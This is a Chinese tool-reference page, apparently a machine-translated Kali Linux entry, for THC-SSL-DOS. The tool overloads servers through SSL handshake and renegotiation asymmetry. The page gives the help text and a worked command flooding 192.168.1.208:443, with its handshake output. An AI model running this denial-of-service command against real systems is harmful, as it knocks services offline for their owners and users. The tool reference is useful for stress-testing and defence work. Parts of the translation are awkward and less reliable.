Powered by GitBook

THC-SSL-DOS包装说明

THC-SSL-DOS是一个工具来验证SSL的性能。建立一个安全的SSL连接需要的服务器，而不是在客户端上15倍的处理能力。 THC-SSL-DOS利用这种不对称性通过重载服务器和敲它关闭互联网。此问题会影响所有的SSL实现的今天。这些厂商都意识到这个问题，自2003年以来该问题被广泛讨论。这种攻击进一步利用了SSL安全的重新协商功能，通过单一的TCP连接触发数以千计的重新协商。资料来源：https://www.thc.org/thc-ssl-dos/

THC-SSL-DOS首页 | 卡利THC-SSL-DOS回购

作者：黑客选择

许可：GPL第二版

0x01 包含在THC-SSL-DOS软件包工具

THC-SSL-DOS - 压力测试仪，用于SSL握手


:~# thc-ssl-dos -h
   ______________ ___  _________
   \__    ___/   |   \ \_   ___ \
     |    | /    ~    \/    \  \/
     |    | \    Y    /\     \____
     |____|  \___|_  /  \______  /
                   \/          \/
          http://www.thc.org
        Twitter @hackerschoice
Greetingz: the french underground
./thc-ssl-dos [options] <ip> <port>
-h      help
-l <n>  Limit parallel connections [default: 400]

0x02 THC-SSL-DOS用法示例

使用100个连接 （-L 100）， 防洪目标 IP（192.168.1.208） 和端口 （443）：


 :~# thc-ssl-dos -l 100 192.168.1.208 443 --accept
     ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org
          Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err

原文来自:https://www.hackfun.org/kali-tools/thc-ssl-dos_zh.html。转载请注明原出处，商用请联系原作者授权。

results matching ""

No results matching ""